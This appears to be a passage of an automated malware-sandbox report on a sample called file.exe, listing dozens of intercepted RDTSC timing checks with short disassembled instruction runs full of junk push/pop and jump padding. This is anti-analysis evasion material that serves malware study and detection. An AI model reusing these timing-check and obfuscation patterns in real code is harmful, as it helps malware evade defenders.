                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64EFB2 second address: 64EFC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC070F37E3Dh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D97A second address: 64D99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC070C1F313h 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D99B second address: 64D9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D25BC second address: 5D25C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D25C4 second address: 5D25E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC070F37E46h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656BF1 second address: 656BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656BF5 second address: 656BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656BF9 second address: 656C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC070C1F312h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62213E second address: 622143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622143 second address: 6221B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC070C1F306h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f jnl 00007FC070C1F30Ch 0x00000015 jno 00007FC070C1F306h 0x0000001b pop edi 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FC070C1F308h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 sub edi, 636A1162h 0x0000003d lea eax, dword ptr [ebp+12487EC2h] 0x00000043 push 00000000h 0x00000045 push ebx 0x00000046 call 00007FC070C1F308h 0x0000004b pop ebx 0x0000004c mov dword ptr [esp+04h], ebx 0x00000050 add dword ptr [esp+04h], 00000014h 0x00000058 inc ebx 0x00000059 push ebx 0x0000005a ret 0x0000005b pop ebx 0x0000005c ret 0x0000005d mov dl, 6Fh 0x0000005f nop 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jno 00007FC070C1F306h 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6221B6 second address: 6221CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070F37E42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622794 second address: 622798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622798 second address: 62279E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62279E second address: 6227B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC070C1F313h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6227B5 second address: 6227C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6227C3 second address: 6227C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6227C7 second address: 6227CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6227CB second address: 622825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FC070C1F311h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnc 00007FC070C1F314h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007FC070C1F313h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 jmp 00007FC070C1F30Bh 0x0000002b pop ebx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622825 second address: 6228AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC070F37E3Ch 0x00000008 jbe 00007FC070F37E36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FC070F37E38h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D2A81h] 0x00000031 call 00007FC070F37E39h 0x00000036 jmp 00007FC070F37E41h 0x0000003b push eax 0x0000003c jmp 00007FC070F37E49h 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 jmp 00007FC070F37E3Eh 0x0000004a mov eax, dword ptr [eax] 0x0000004c push eax 0x0000004d push edx 0x0000004e push edi 0x0000004f jno 00007FC070F37E36h 0x00000055 pop edi 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6228AD second address: 6228C7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC070C1F30Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6229D4 second address: 6229DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6229DA second address: 6229DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6229DE second address: 6229F2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b mov cx, dx 0x0000000e nop 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622B84 second address: 622B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622B89 second address: 622B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622B8F second address: 622B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622CD0 second address: 622CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622CD4 second address: 622CDA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622CDA second address: 622CDF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62306E second address: 623099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D5A12h], edx 0x0000000f push 0000001Eh 0x00000011 nop 0x00000012 pushad 0x00000013 push ebx 0x00000014 jmp 00007FC070C1F312h 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623099 second address: 62309D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62309D second address: 6230B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC070C1F30Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623454 second address: 623458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623458 second address: 623473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC070C1F310h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623473 second address: 62347D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657139 second address: 65713F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65713F second address: 657144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657144 second address: 65714A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6572BF second address: 6572C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6572C3 second address: 6572D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6572D0 second address: 6572E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a pushad 0x0000000b jo 00007FC070F37E3Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65749B second address: 6574AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FC070C1F306h 0x0000000b popad 0x0000000c jnc 00007FC070C1F30Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65761B second address: 657625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657625 second address: 657630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC070C1F306h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65779C second address: 6577A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6577A2 second address: 6577D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FC070C1F313h 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push ecx 0x00000010 je 00007FC070C1F306h 0x00000016 jmp 00007FC070C1F30Ch 0x0000001b pop ecx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66143C second address: 661440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65FF58 second address: 65FF5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65FF5F second address: 65FF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E42h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC070F37E47h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660117 second address: 660138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C1F318h 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660332 second address: 66033C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6605E9 second address: 6605F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FC070C1F306h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6605F5 second address: 6605F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660C2E second address: 660C5A instructions: 0x00000000 rdtsc 0x00000002 je 00007FC070C1F306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FC070C1F308h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FC070C1F316h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663D2D second address: 663D55 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC070F37E3Ch 0x00000008 push ebx 0x00000009 ja 00007FC070F37E36h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007FC070F37E3Ch 0x0000001c je 00007FC070F37E36h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6667A9 second address: 6667C9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC070C1F306h 0x00000008 jmp 00007FC070C1F316h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6664BE second address: 6664D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 jne 00007FC070F37E36h 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6664D2 second address: 666502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C1F30Fh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC070C1F313h 0x00000010 jl 00007FC070C1F306h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666502 second address: 666507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666507 second address: 666526 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F319h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666526 second address: 66652A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C0DB second address: 66C0E9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC070C1F306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622E9B second address: 622EB6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC070F37E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC070F37E3Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622EB6 second address: 622EE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F30Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push edi 0x0000000b movsx edx, di 0x0000000e pop edi 0x0000000f mov ebx, dword ptr [ebp+12487F01h] 0x00000015 mov edx, dword ptr [ebp+122D2C2Dh] 0x0000001b add eax, ebx 0x0000001d and edi, dword ptr [ebp+122D2673h] 0x00000023 push eax 0x00000024 push esi 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C225 second address: 66C239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E40h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C239 second address: 66C23F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C23F second address: 66C274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007FC070F37E3Ch 0x0000000d jmp 00007FC070F37E44h 0x00000012 pushad 0x00000013 je 00007FC070F37E36h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C3DC second address: 66C3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C3E2 second address: 66C3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d ja 00007FC070F37E36h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C3F6 second address: 66C409 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F30Eh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FB02 second address: 66FB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FC3C second address: 66FC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FC42 second address: 66FC4C instructions: 0x00000000 rdtsc 0x00000002 je 00007FC070F37E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FC4C second address: 66FC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC070C1F316h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FC6E second address: 66FC7B instructions: 0x00000000 rdtsc 0x00000002 js 00007FC070F37E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67410D second address: 67411D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F30Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67411D second address: 674132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E41h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6747CE second address: 6747D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6747D4 second address: 6747DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6747DA second address: 6747E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6747E0 second address: 6747EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007FC070F37E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674919 second address: 67491D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AA60 second address: 67AA8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC070F37E46h 0x00000008 jno 00007FC070F37E36h 0x0000000e jnp 00007FC070F37E36h 0x00000014 popad 0x00000015 jne 00007FC070F37E3Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AA8E second address: 67AA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FC070C1F320h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B051 second address: 67B07A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070F37E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FC070F37E47h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B5EB second address: 67B601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FC070C1F306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007FC070C1F306h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B601 second address: 67B605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B8F5 second address: 67B8FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B8FC second address: 67B906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681F4D second address: 681F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6852A6 second address: 6852AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
